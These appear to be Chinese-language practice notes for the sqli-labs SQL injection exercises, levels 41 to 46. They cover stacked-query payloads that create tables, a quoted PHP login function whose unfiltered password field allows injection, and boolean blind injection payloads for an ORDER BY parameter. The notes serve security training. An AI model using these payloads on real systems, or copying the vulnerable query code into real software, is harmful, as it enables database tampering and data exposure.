41

payload:?id=1%20;%20create%20table%20test41%20like%20users;--+

42

步骤

手动

function sqllogin($host,$dbuser,$dbpass, $dbname){
// connectivity
//mysql connections for stacked query examples.
$con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];

// Check connection
if (mysqli_connect_errno($con1))
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
else
{
@mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");
}

/* execute multi query */

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
if (@mysqli_multi_query($con1, $sql))
{
/* store first result set */
if($result = @mysqli_store_result($con1))
{
if($row = @mysqli_fetch_row($result))
{
if ($row[1])
{
return $row[1];
}
else
{
return 0;
}
}
}

else
{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}
else
{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
}

对username有过滤，password无过滤且存在堆叠注入。

payload:login_user=1&login_password=1'; create table test42 like users #&mysubmit=Login

43

payload:login_user=1&login_password=1'); create table test43 like users #&mysubmit=Login

44

payload:login_user=1&login_password=1'; create table test44 like users #&mysubmit=Login

45

payload:login_user=1&login_password=1'); create table test45 like users #&mysubmit=Login

46

步骤

手动

参数是order by，输入内容并未被过滤。

1.布尔盲注

?order=if(1=1,username,password)
?order=null,if(1=1,username,password)
?order=(case when (1=1) then username else password end)
?order=ifnull(null, username)
?order=rand(1=1) //order by rand(1)/rand(0)两者返回不一样
?order=(select 1 regexp if(1=1,1,0x00))

2.时间盲注

3.报错注入